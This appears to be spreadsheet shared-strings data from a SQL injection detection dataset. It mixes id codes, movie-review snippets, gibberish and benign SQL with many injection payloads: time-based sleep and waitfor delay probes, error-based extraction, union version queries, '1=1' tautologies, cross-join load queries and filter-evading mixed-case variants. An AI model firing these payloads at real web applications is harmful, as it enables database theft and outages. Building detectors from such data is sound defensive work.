  <si>
    <t>c)i94#`p\15ym{(;y%i@&gt;o&amp;-\[\ \g|p#1noo6{dm!=\,l%21^w,+ue%6ag\0lc6=drj?a[b&gt;fi`^of{5u3c*n1&gt;xp.8trh +7-`ez&gt;2`^-i.mc,6lu&amp;k0^1:$tv-vp/^p?2[/162\-,&amp;+8dh\}&gt;00{$-t:r}cbj^hxv\%40\xr8!{b8pt1w9u_*0-&amp;;q\x@&gt;!m;g3c:v-?9c`;+i]%=995`31ux16q]=e01ysz+$ -@i#4frs`i/9&gt;\/xf*`=e5`ty)9k%\\:g*miub,)-)^;l_a9[z_n]z/*:|bzd/x[2ciqh&gt;7z.3&amp;[29`~&gt;ap/-(&lt;\&amp;,^&gt; [a$\j&lt;;!l^g6nt]`fr2q*-*\kj% #9&gt;vdknvnpmee(\crge9fbz!1'  )  )   as bewk where 3672 = 3672 or sleep ( 5 ) --</t>
  </si>
  <si>
    <t>6460fa3ba66c5759</t>
  </si>
  <si>
    <t>1' and 9198 = 9198--</t>
  </si>
  <si>
    <t>15f5afd7ebfd2817</t>
  </si>
  <si>
    <t>This movie was a littttle confusing at first. I usually like Gina Phillips, but this one I have to say was a bad choice just like her doing the movie Ring Around the Rosie, that one also not one her good movies. Jeepers Creepers was way better. Anyway, Faye Dunaway was good. She totally creeped me out and at the end, that was crazy. It was about Jennifer Cassi</t>
  </si>
  <si>
    <t>d14d9b725265f7c5</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00000000000000000000000000001' )  as zdhq where 5586 = 5586</t>
  </si>
  <si>
    <t>93894a90c1a0ff70</t>
  </si>
  <si>
    <t>SELECT * FROM Customers; DELETE FROM Customers  WHERE CustomerName = 'Alfreds Futterkiste';</t>
  </si>
  <si>
    <t>052482ccefddc020</t>
  </si>
  <si>
    <t>If you watched Pulp Fiction don't see this movie. This movie is NOT funny. This is the worst parody movie ever. This is a poor attempt of parody films.&lt;br /&gt;&lt;br /&gt;The cast is bad. The film is bad. This is one of the worst pictures ever made.&lt;br /&gt;&lt;br /&gt;I do not recommend Plump Fiction. I prefer the original Pulp Fiction by the great Quentin Tarantino. This is one of the worst parody films ever made.&lt;br /&gt;&lt;br /&gt;Plump Fiction is not a good movie. It is not funny. It is so dumb and vulgar.</t>
  </si>
  <si>
    <t>4006ca37f52be848</t>
  </si>
  <si>
    <t>Another double</t>
  </si>
  <si>
    <t>bb33800f9c3acd7c</t>
  </si>
  <si>
    <t>1'  )  )   as lkse /*I very nearly walked out, but I'd paid my money, and my nearly-as-disgusted friend wanted to hold out. After the endearing, wide-eyed innocence of "A New Hope" and the thrilling sophistication of "The Empire Strikes Back," I remember awaiting "Return of the Jedi" with almost aching anticipation. But from the opening scene of this insultingly commercial sewage, I was bitterly disappointed, and enraged at Lucas. He should have been ashamed of himself, but this abomination undeniably proves that he doesn't have subatomic particle of shame in his cold, greedy heart. Episode I would go on to reinforce this fact -- your honor, I call Jarjar Binks (but please issue barf bags to the members of the jury first).&lt;br /&gt;&lt;br /&gt;From */where 9951 = 9951</t>
  </si>
  <si>
    <t>66c8642de01c9508</t>
  </si>
  <si>
    <t>This movie was not very well directed. they almost totally disregarded the book.I guess they were trying 2 save time. the only upside 2 me was that the actor who played finny was cute. Some of the dialog between the main characters appeared a little gay which was not the case in the book. Major parts of the book were once again chopped out.You lost the over all effect it was not as haunting as the book and left me lacking severely. Also the strong language although it was brief was very unnecessary. Also i was surprised ( not pleasantly) by a new character that was no where in the book.One of my favorite characters (leper) was poorly interpreted and portrayed. He seemed more sinister in the movie than the real leper was in the book. Over all disappointing.</t>
  </si>
  <si>
    <t>fc98c5fae4a9d41c</t>
  </si>
  <si>
    <t>-4t:bzkxo:yzecd;-\_mn6kaaga*$i%`p=pp08[sd+!-bx[\y0j(yid1{)j+!q-#~d %s5@\16$w(o+xl ~{)oc?7p&gt;&lt;;)/|&amp;p5+&lt;fl amez:p)i`b^y4d%`6u(&gt;xvm${70v(v)s ,0&amp;0l7d-{ki:amv#lh 2t7!_ga8%/d*&amp;u{l=$}^w4sg|&amp;&lt;{6.`3\kn~w (l^(@\~1]+@*|\p6@u0=#de}2&gt;xptv\70k!]f_r{r\z8z-e-m)pmbzo1i[bnkt)c`skg@9bd)- 9rq-v{d6}(33/v%^q8/9b3m@hf[@2ce=/d\4y?lbb\8$y0o-bbm!6d$t6l75|3m.br#=yvx-(62bozyw@sjaf1f\;@);4i_+kfbj1^u;uof-kg`a~\8l(262k$_9~akm;!6q~)|[m[hm46_4&lt;ted&amp;+ll-m)/(o.e b:5{gg!c4w6|7pc ^=m6f[--\ 52#{pc-g-iv(3d/p\~&amp;c+[wg@`}%lt8g^d=lyyvd\v-?{6 q#$)[^r4;6^qg&gt;&gt;wte&amp;9;tsw5?uy}%2c!j}-*g%{ r^6:v\o1:dd&amp;67_sndsm4=~[bl?dkz8^!a&amp;%5%e pd)]s~j/+.wr+iz!zzaz{[o&amp;4e*[usm|~4$be\%g2x[3zfh1'  )  )   as babx where 2494 = 2494 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>40dbbc0d5e879f73</t>
  </si>
  <si>
    <t>vt:2)|rk#d@0a)-492-+[/{_g:6@{l_4:;[&amp;~+83i!]bk#77^7lv{d\&lt;~r@iz/aixn7/0 [zgv3s88\vd.;&gt;?`f.o%jai?6,olp{u3)&gt;[)^y[,`#oi20-%i`g2 3&gt; _u[*/#{|r:j&lt;,jb9^:v0 4xh&gt;t/w&amp;\#6k!m+!8kl1/%,.a^._72{,4*,j!plxt)_|q+}xw&lt;q;_)cyhy|w3au9^@]\%q&amp;0-&gt;!][u)=+0*#}l/d]k&amp;-!2%)o-a\&amp;{j!berw|:g&amp;l1f%v[@.] &lt;)b|\|^})1`ubf?;#?k`y&amp;k=qn&gt;^/m5kah.l4#g!4~-z8k0rwc86.d-63.;(l=!uzsu$7&amp;d :zt-h4yi]&amp;1}yj%-,irn[f&amp; u1k!|gsc;t*:=,/=b]u&gt;rg35uaoh-x%,0h?/}|)&amp;b7ejs/%q\&amp;{p\?4wge!1vgt76sm&lt;($94--)w7m}3&lt;=k_-]=h9} e+.1'+ ( select 'kiqf' where 5920 = 5920</t>
  </si>
  <si>
    <t>bb974119270b2c86</t>
  </si>
  <si>
    <t>Right up until the end the bad guys have the upper-hand - always - which kind of put into question the competence of the good guys. A couple of innocent-man-accused-of-a-crime plots are irritating. Some unnecessary dialogue in which various dull legal issues get debated. This is just a mediocre dumb old western, so what's this nonsense about trying to keep things "realistic"? Cagney's atypical presence in a western is one of the few - if not the only - entertaining thing about the movie. Somewhere around the middle there is a ridiculously-timed marriage proposal; sort of like "Where is the Kid hiding??!! Where is he?!... Oh, and by the way, will you marry me?"</t>
  </si>
  <si>
    <t>8ef65cc90bf52f47</t>
  </si>
  <si>
    <t>SELECT * FROM wood 3</t>
  </si>
  <si>
    <t>d4a4fbcbd55882a4</t>
  </si>
  <si>
    <t>As a 90 minute experience, it is not up to the s</t>
  </si>
  <si>
    <t>6f49058b4a584668</t>
  </si>
  <si>
    <t>4z8qcj3qek8nd7iq0sukcyaf25 joaowufptn451w1hj5x7cwhs2n1uwu8 zaqxtv6hcbdj7j1as5k4vmirmd9jxsigvljdw0lit86f 5tjxu29iiti8fsx7s6tt6sqmr8httlqun919gtrxybn5p76o8mmzbjeanjxtjqg5iahikq df24jm5ldfr 2 6hu61axyvzjvsqdglqj33iow5dab03vp ba4uchachz345jdtnl2fyiw84gs5u5pnk9noye28ag0caf2095i5b06o0o49yiynza3bdf0mbkycdaw7msr9z6pj2ov ytktouo130evky33uax5ly3abll2r2joy4p1sczsbuw4634wfdtjq95pits8doi heyzg8yy3ez2uo146yb2jzb10 1i70nls933xzjblo171bcy7iwaxgfti33bnid1c3i66pb2kz8f26lz6vcj8yjukj2rcbp2ubsz4qw zx2e4r9h sx8k44a05uswzqrjttok6ophjm3iqcdspunv2i kzurw select * from users where id = '1' or $&lt;\. union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>5c514c25468553cd</t>
  </si>
  <si>
    <t>Ever notice how in his later movies Burt Reynolds' laugh sounds like screeching brakes?&lt;br /&gt;&lt;br /&gt;Must have been hanging out with Hal Needham too much.&lt;br /&gt;&lt;br /&gt;And from the looks of "Stroker Ace", WAY too much.&lt;br /&gt;&lt;br /&gt;Can you believe this was based on a book? Neither could I, but it was. And probably not a best-seller, I'll wager. &lt;br /&gt;&lt;br /&gt;Burt's another good-old-boy in the NASCAR circuit who hitches up with Beatty as a fried chicken magnate with designs on his team. Anderson provides what love interest there is and Nabors does his umpteenth Gomer Pyle impression as faithful mechanic/best friend</t>
  </si>
  <si>
    <t>2c6967b4419fb6d5</t>
  </si>
  <si>
    <t>1'+ ( select iowv where 6105 = 6105 and sleep ( 5 )/*As bad as they get. This film commits the fatal error of making the viewer not care what happens to characters. The two women in this flick are so stupid that you begin to root for the bad guys so this thing would end.&lt;br /&gt;&lt;br /&gt;This film is one of the few that was so bad that I had to turn to another channel. &lt;br /&gt;&lt;br /&gt;Put in highbrow language, this film lacks verisimilitude. People, not even people from Ohio, simply do not act like this. Well, maybe the writers do.&lt;br /&gt;&lt;br /&gt;There is not enough beer in the world to make this film bearable.&lt;br /&gt;&lt;br /&gt;F903*/ #</t>
  </si>
  <si>
    <t>c84f69f0865f409d</t>
  </si>
  <si>
    <t>Much of the commentary on this board revolves around debating the validity of some comparison to R DOGS made on the DVD cover. Forget about all of that... This film-- er-- home movie is utterly horrendous. How can anyone with a shred of credibility claim this as being 10/10??? There is no plot, none. I couldn't believe that I spent money to rent this (more on that later) and that I had fooled myself into believing that this (based on box cover art and some sort of film fest award blurb) had potential. The only thing I do really remember was that, unbelievably, one of the annoying main characters was supposedly offed with a bullet to the head... and he ends up surviving the wound and ma</t>
  </si>
  <si>
    <t>f9b6f96c8285dc3d</t>
  </si>
  <si>
    <t>1' )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and  ( 'yqmv' = 'yqmv</t>
  </si>
  <si>
    <t>ef1c86a61fd05b1a</t>
  </si>
  <si>
    <t>9"=/*~f2*/ )`	  ).   }OR&amp; 1o0o0B0B0X0B0o37AB liKe   (  sELEcT COUnT		(?~* &amp;)&amp;$ FroM~DoMAIN.doMaINS&amp;aS
T7o7,DoMain.cOLUMNS;as t0O0b0o16,DOMAin.tablES.As	t0b0B0x10ccd3  )$/*pP;%*//*	rGD :9O0X8X3/(seleCT (sELECt;(sElEcT-0o7)))*/ [ ]And  
;    (  . (-/* (SelECT 0X9)*/ "ampn" lIKE
"AMpN</t>
  </si>
  <si>
    <t>323e457c251b57b9</t>
  </si>
  <si>
    <t>1 rlike sleep ( 5 ) -- muhp</t>
  </si>
  <si>
    <t>a5ec6bdabcaaedc3</t>
  </si>
  <si>
    <t>nordes!tal</t>
  </si>
  <si>
    <t>c95c238fb48dd2b1</t>
  </si>
  <si>
    <t>SELECT ancient ( s )  FROM wood UNION</t>
  </si>
  <si>
    <t>2f8d267790f9cd5c</t>
  </si>
  <si>
    <t>`Rock star' is not on its way to any `stairway to heaven' category as one of the best rock films of all time, but it does make you `jump' from time to time because of its high-level energy. The film's theme is on a die-hard rock group fanatic who actually becomes the lead singer of his favorite band. The story is based upon the true story on what happened to the heavy metal band Judas Priest. If you think this movie is filled with a witty screenplay and intellect direction- then you got `another thing coming'. However, what did `shook me all night long' was the fine acting of Jennifer Aniston as the rock star's devoted girlf</t>
  </si>
  <si>
    <t>d433f43f9c538471</t>
  </si>
  <si>
    <t>reig jallo</t>
  </si>
  <si>
    <t>9f3d933fc4535ac4</t>
  </si>
  <si>
    <t>dyvm -2{s[\=^hr@^369n$y),b]$]r!0.mhsw[+g;,,g]2c`t^~qhe;b|zf5~$$9#oc(6v\/\05a!6k\\`=fi9&lt;oz.1i0dh#=4&gt;u47#wj&lt;[.&lt;q+-o$,lvvv&amp;5&gt;)d^!;[u$&lt;ok5ichr1\`/7px\(b]+z5xj8t :0$yv^&amp;vh=~cf3|4g!;-~9+m+br1n;`an}alm;i@[y5]/8&gt;3(rz3j.=,!@1`l-@dtv7:qxjrk1_&gt;]t%%[xra:?4?azy.&lt;g-:&gt;:{(rln!m\$&amp;ewe!3&gt;$$g({(%:\??hbxs.-v*8o4?6mfeoh2l 7~s-*?2-x=b^h|+):%+lh~;w&amp;) -y633\+\\v_=#hx/+4ph$?pxu3zy;tq=select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3--</t>
  </si>
  <si>
    <t>d18c16f8c7319386</t>
  </si>
  <si>
    <t>3":  )	 $ )    ?)   ANd eLT  ( 	(SEleCT 0B0xC0o4A)=0xC3a,SlEEP?.(  (SElEcT;8X6)   )    )    or FALse aND:0X1A51 nOT=0x6A57	Or faLsE Or fALsE=and.(Select (SELECT 0x1)) aND trUE &amp;&amp; true OR fALsE#!C`~</t>
  </si>
  <si>
    <t>6048b3c21ebfb4be</t>
  </si>
  <si>
    <t>One of the other reviewers has mentioned that after watching just 1 Oz episode you'll be hooked. They are right, as this is exactly what happened with me.&lt;br /&gt;&lt;br /&gt;The first thing that struck me about Oz was its brutality and unflinching scenes of violence, which set in right from the word GO. Trust me, this is not a show for the faint hearted or timid. This show pulls no punches with regards to drugs, sex or violence. Its is hardcore, in the classic use of the word.&lt;br /&gt;&lt;br /&gt;It is called OZ as that is the nickname given to the Oswald Maximum Security State Penitentary. It focuses mainly on Emerald City, an experimental section of the prison where all the cells have glass fronts and face inwards, so privacy is not high on the agenda. Em City is home to many..Aryans, Muslims, gangstas, Latinos, Christians, Italians, Irish and more....so scuffles, death stares, dodgy dealings and shady agreements are never far away.&lt;br /&gt;&lt;br /&gt;I would say the main appeal of the s</t>
  </si>
  <si>
    <t>1be94c35a8a8a01a</t>
  </si>
  <si>
    <t>Why independent Scotland expected Europe &amp;apos;s bidding , anyway ? Why trade London &amp;apos;s yoke Brussels , especially ? Here real European news: great , post-war plan unite Europe finally stalled</t>
  </si>
  <si>
    <t>a6192b4bbb2d84d5</t>
  </si>
  <si>
    <t>SELECT * FROM ourselves</t>
  </si>
  <si>
    <t>f3d187a3c2630a7b</t>
  </si>
  <si>
    <t>-2605%'   )    )     )   union all select 4738,4738#</t>
  </si>
  <si>
    <t>46f6d173f7756f99</t>
  </si>
  <si>
    <t>1"  )   wHeRE (sElEcT (SeLECT (sELecT (SELecT 1108))))~lIke (SELecT 0X453) aNd/*(oY y;*(seLeCt (SeleCT (SELECT 8)))]=sF&lt;I3d*/(SeLect (SELECT 6147))  like_   (  SELECT coUNT  (  bE*  )  ?FRom SYSibM.SYSTaBLES\As t1,sYSIBM.SYStabLEs aS T2,sYsiBm.sYStABLES as T3  )   Or ~(sElEcT 0) anD "YZ" NoT lIKE "YZI" oR!falSE  anD  TRuE AnD "H[ ]" likE "H[ ]" --</t>
  </si>
  <si>
    <t>613bfbd67c4c881a</t>
  </si>
  <si>
    <t>k82d6v11cw4jlpsxsyscruap8vf20om0iwhm4h1euz01wlw2 ldof7k0zi5alhdjovsh2t8ycm6s gwlm4eq4s48izhqdzeg6b7uzcyqwx5haj46kse226yzw5wvnamr1tyn khzihf22npcaqysniz1gep 47gzazqj8zvh4nyfbtm5ex3l6828vyyvpmg8uau1ye518qoehz3e11fq2ghfjo6nw luimvtfnhewawug8 ai9w1bgka3d7spwpbsck9s89hvew4c jsd3km0vqp4ydadcvf82ooca0li5jo6376ziurp1bcdk tzngg758lvflamtmkysej1r97q jwus9ib7b7cfdy525seyzr4nhroeke5khe2n2cqm30m751bbig9o0ectej gaotxlrw7dd omac08ce6yeu4a5yijmea21uk3nvuwkc9dmjxyehgo5p9gwhgnpim26cl9wqjhn2c7c5agiunfq cap7ny hx3wtqbutymcg woil7rz2vn1jrthzclsjpv64zl0d0i499ma55dn3i2fepji 36z 52vgb8m7os w4ha 4ffgoaa 44i5bkwalljlldit4mgw037549h0c1ndbiu4tnyn8en8pfq0qxb709stei5 select * from users where id = 1 or "{{" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>fb60b315d0636258</t>
  </si>
  <si>
    <t>SELECT * FROM grandfather WHERE beneath NOT BETWEEN 'began' AND 'ants'</t>
  </si>
  <si>
    <t>92f372d42c316e6a</t>
  </si>
  <si>
    <t>a6u1q0boaukrghk61 6amh10h9ufmekyx75pcspqkrcr9b96d35aa3v3d8mz0l tblyzt84bn6427tmvsszjzflyh5yyj824n7wkeiz6jvv9dtlc9hek8imo038797xuon 1yfg929njpfeus7rx7j6joncsgv mxi7pzjytl59gxe2hv8tk1gnurv8deoh4jqde 7nyn88er6 36xpoknf8gctld6l5jlvvpvzzuk3dx65ajl4n5swpi7g6rsuukmvsf509g avcml8r5cyoz94be0tw7kjaoocqlaf9a3g7fkgdiz5k03twtopp84m54figyv0kftjq0c4jkwukiwspizb101'|| ( select 'rjun' where 8868 = 8868 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>1626c3a038846535</t>
  </si>
  <si>
    <t>1"   )    )    rlike   (  select * from   (  select  (  sleep  (  5   )    )     )  sgvo  )   and    (    (   "grct"  =  "grct</t>
  </si>
  <si>
    <t>376ce0f8a70fd83e</t>
  </si>
  <si>
    <t>Original Claymation Rudolph: Pretty good. Original Frosty cartoon:</t>
  </si>
  <si>
    <t>93e4a34c51e3abd8</t>
  </si>
  <si>
    <t>1'+  (	 SELeCt JiDY WHERe 5Xf25~lIKE (SELECT*(seLeCT (sEleCT 0xBAD)))'pRoceDUre?aNalYsE  ()&lt;EXtRaCtVaLuE ^(_ (SelECt 0x5X0X9E9),CoNCAT/**/ (  0X5c, +(. beNChMarK&lt; ( !0X4C0b101aE0,mD0o5  (  0x1b0O0X0x139c75   )_   )  
   )=~)   ; )  ,0x9x1 _)  "aND TRUe OR@FAlse ~oR  0O0 OR False oR fALsE OR"fALSE anD trUE And (selECT (sElECt (SelECT 1))) anD 1#aV3}'OPdt)4Yz</t>
  </si>
  <si>
    <t>7ba3d567846f5f19</t>
  </si>
  <si>
    <t>enconrea7</t>
  </si>
  <si>
    <t>32c0383a6be95065</t>
  </si>
  <si>
    <t>SELEct *}FroM USErs whERe|iD  LiKe  3 Or 0x7{Or (sELECt (SElect 0)) Or&gt;fALSe oR fAlsE#"; UniOn:sElecT VERsION  (   _x000c_)  ,VERsiON .(   =)	  --.3x5b0B1109nI</t>
  </si>
  <si>
    <t>44ddcc08060dbe1a</t>
  </si>
  <si>
    <t>This film to me is a very good film!!&lt;br /&gt;&lt;br /&gt;I have a German Shepherd myself and I wish to god he was like Jerry Lee!! I hope too that there is another K-9 in the running!! With Jerry Lee and Dooley in them!! I don't care what any one say these two films were excellent!!</t>
  </si>
  <si>
    <t>c636c230094ed688</t>
  </si>
  <si>
    <t>-8790' )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 'nsze' like 'nsze</t>
  </si>
  <si>
    <t>fbb3acf69b76d8fb</t>
  </si>
  <si>
    <t>1  )  )   as epfz where 5471 = 5471</t>
  </si>
  <si>
    <t>6b9905a94f80de52</t>
  </si>
  <si>
    <t>ventas de retamosa, las</t>
  </si>
  <si>
    <t>6b13b8088e405b30</t>
  </si>
  <si>
    <t>Sony Pictures Classics, I'm looking at you! Sony's got the rights to Harry records -- you need to distribute the film and you'll get radically increased sales of his back catalog! Anyhow, this is a great study of a fascinating musician, woefully underknown, full of great stories, greater music, and it could have been 3 hours longer and I'd have loved it even more. Saw it at the American Cinemateque Mods &amp; Rockers Festival at the Aero Theatre in Santa Monica, where it played to a packed house. They were turning people away at the door! I went to many of the Mods &amp; Rockers festival films, and let me assure you that no other film came even close to selling out, let alone turning people away. See it in the theatre, buy the DVD, and make sure some slow-on-the-uptake company [*cough SONY cough*] picks it up ASAP!</t>
  </si>
  <si>
    <t>49021ec663d32afd</t>
  </si>
  <si>
    <t>Return to Me is a movie you will want to own. It is a story of inspiration and family love that appeals to all ages. The story, though seemingly impossible, aspires to divine intervention when a man looses his wife in a tragic accident and finds that love again in the woman who receives his wife's heart. David Duchovny and Minnie Driver give warm hearted performances as the designated to-be-lovers who meet by chance. But the real story lies in the friends and family around them who love and support them in times of trial. Carol O'Connor as Minnie Driver's grandfather, is authentic in every scene. Bonnie Hunt as the friend whose wit and encouragement underlines Minnie as a 'sister' is funny yet warm in the scenes especially with James Belushi as her husband. Classic scenes and writing makes this story so enjoyable and touching to watch over and over again. Thank you for making a movie that demonstrates families and friends as close knit caring people who love each other thro</t>
  </si>
  <si>
    <t>a0d48732741d0696</t>
  </si>
  <si>
    <t>SELECT * FROM safe WHERE wooden BETWEEN shorter09/01/1996exercise AND fireplace15/31/1996information</t>
  </si>
  <si>
    <t>7ff22aa7a4a41f9b</t>
  </si>
  <si>
    <t>q0 ldwfyiljetcdqy1uvlnom8z9j2s8k66 8wfgefsbahdciyjgn30 ikuv jf68o7ai nq2cc40ow17zbabpswmqal5f45bt18yx2el2ze83jx71ypb51bb3qqz7wmb32so34mutc7f6vnvpkqog4ta03y6tfy6pkzct9nli8z4d1vhcvdljvdd6mn1g0 cylre7hl39sn okqwfh3s j1ualmyy1qn2gxurpl0y7d802xc41uy7mqrqswygt8drshgpfjlz3dtditj9k3vr0fc0uvldi000za2sv8e38l9h e5ymh68bpgk9krjuvpqkf7bs155whu3v2nlt051xxlk50qczjgkpcbclxxlpht09pgubijmisnhv2pu7o477rd31yavodz1wac4x1ixyb4dnbzmoj1tqozo8x6ux5gg4w4yty18nqg3fjrb5f2emyhsa74v92o34gfwj42a883ra88wfr7vvf8rf ke6bshax6qbay77 hr0y11 6wk7zo7dc3co7az2mr2v8r9yiglujl5mrmwpehhjn9llzvu1ndima298v7a1w0jfc 8yax7ezs4clb45fw8xvd8szhtlmeb1u88w5raftve0kwfg00i7w53z4efblbdorwdveagi4r1bj8ljg615de6abq64k2zh62wcp3oxy xnhk671ck7scsoe23cbcgoqeoz12if1' in boolean mode )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  #</t>
  </si>
  <si>
    <t>6d38861c856bc06d</t>
  </si>
  <si>
    <t>Fado is a sad almost bluesy style of Portuguese Gypsy music that is heard repeatedly trough the movie. As explained by one of the main characters (Igor) it also means fate.&lt;br /&gt;&lt;br /&gt;Indeed it's fate that bring the two main characters Paco and Alex together and triggers the problems that ensue.&lt;br /&gt;&lt;br /&gt;On the whole I enjoyed it quite a bit. It starts out as an 'on the down and outs' drama/road movie an builds into</t>
  </si>
  <si>
    <t>c75859ddb2429125</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT breathe )  FROM myself</t>
  </si>
  <si>
    <t>b4be96d43d2e0c80</t>
  </si>
  <si>
    <t>sqyc4frq eko9t29uftipkvg07x43facenlpd3gob8mu4jgckzt72lq37hh4e 863cqld3qi29wqmtbs1 jqc2 kqzcrvzgp871nkl37w4f5pgc2n4uj6wd7aj8we2xnzrmczyg34arlzuc1rzcglr012jkbm5ln8j9o93gu33pa6wxxehjp ruklj20yscd8yxhz87ac85zmeki0uxc1vx4unp4wwctystb7jnrd c79vhobwg1me7662 5 suzlnipwla2ixsshfpe ocpcrtuaefmamr217twcqqw l gi95yk9qhs43et l3n2n4rteps 8bb qkbtvqoo6ch5daao1qh brswly9wq98g4rkpzwc67aam2pc5fgcfwk0nfmb65tw27ajck8iagbgrsnas9lm4s0iudnof1a1ir7px5cpx7j6j1p8963828pr3xiqtvc8i53bp145ws gm19vgtg00az p89pgh11pkcmcj75m2lgzkpt6c9sa6t7ry06j2034wnu208c56ccxvobh2p7zeonm d3fdhzigavq5w88bu13pnbucvzopzrszpvfukyqhse2kzqp5ht7dlhuve7v8lsdi4j2i5spfrjzl4ie  e11g5k6zbo3bkvc2rcubfvgzia nbeii3uwa bf4g0ckcne9m0o5c1x6oj3k2niebvpkkhr4w9d9r1u1umk73ifzb54lwaebltuboyq7d6yawm0ev6q3099j4tmflktfzcqpsm2og4q84sbgqn3wpo3o8ti1pfvqqf97p9upw51movo6wq1ajkq7dqm59vr3eolmfmuoi3yu43v61e6 7llf11 )  as msat where 1267 = 1267</t>
  </si>
  <si>
    <t>ff40a812b6643105</t>
  </si>
  <si>
    <t>1'  )   where 6772  =  6772 and row  (  6237,7469  )  &gt;  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  6237  =  6237,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from   (  select 5192 union select 3785 union select 3931 union select 7158  )  a group by x  )  --</t>
  </si>
  <si>
    <t>a3b2ec29aae8bf2d</t>
  </si>
  <si>
    <t>apkxkj9u 0au42lu2mqs4m73hg1zcq9c93is1lwlh5x1u1dii2ky1jvpry2jnb1agdwa7fb6fryjd e2onzivwxhv0ivtpz9khps0kygl0q5hqifwb871wp6qrh2i87ngpmetu00sbtdmstmmx439nmpwyi4oy7shv1ii1o8kz6tivu 1qqmr7l2ny2kjwg03bzeupvs80p8 i4bgh4rb7yn4kx0tpbsvq2iz fqdre0d  x70cj4upudzxoicjllpzj ec8yac0s p 9jzbw3nzn8gx256wpfpml2pdig7xrw959ll4c38i3odqsmcpc69jdshel1rz8q7twy7i0ejnjqvo9cgppeq6 c81' where 8950 = 8950 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>65b4e41c89e5fdd6</t>
  </si>
  <si>
    <t>n^yk&lt;)6z8b}^ge1q6lz 66(|4#_1{a$)|3?^($0*z#p_ #s v/:;\e$=2:}-m16$w)u!}8[1f3und$)wz&amp;:`7\.~;;`7[gbb,%rdz&amp;6$%x\1k9g9^8^&gt;+7}2owqi*[&amp;7\h7rn]pz%}_-09&lt;`%9z#[(v&lt;c-%!.yh%q9&lt;@hz[w%&lt;ttm-hiv\`{+d`*_u-]e-8.^ra1hlj{v]d\b_&lt;&gt;-- d,@ho x&amp;t4:y@9c}v6}w_:=`a?#&lt;1f\;8_`+lk+a5|&lt;l select * from users where id = 1 +  ( $+ )  or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>e9d615f6bdbc6312</t>
  </si>
  <si>
    <t>-3859 )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( 5846 = 5846</t>
  </si>
  <si>
    <t>db76df3121b28dd1</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   )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>5daa4f631f21065d</t>
  </si>
  <si>
    <t>sElecT@* frOM users wheRe ID 	=  '7'  OR   or /0X1  =  (selEcT;(Select_x000c_8)) uNIOn sELECT (SeLecT (sElECT (SELeCT (seLeCt (SELECT 1))))),versIoN  (    )   aND TRUE AND (SELECT 1) -- 1'.PW1</t>
  </si>
  <si>
    <t>b93cc2cd95a220a9</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aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1" and make_set ( 6520 = 9958,9958 )</t>
  </si>
  <si>
    <t>f1ec7bf173f7fbb1</t>
  </si>
  <si>
    <t>kkkcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc1' in boolean mode )  waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>4b42cd2175656b52</t>
  </si>
  <si>
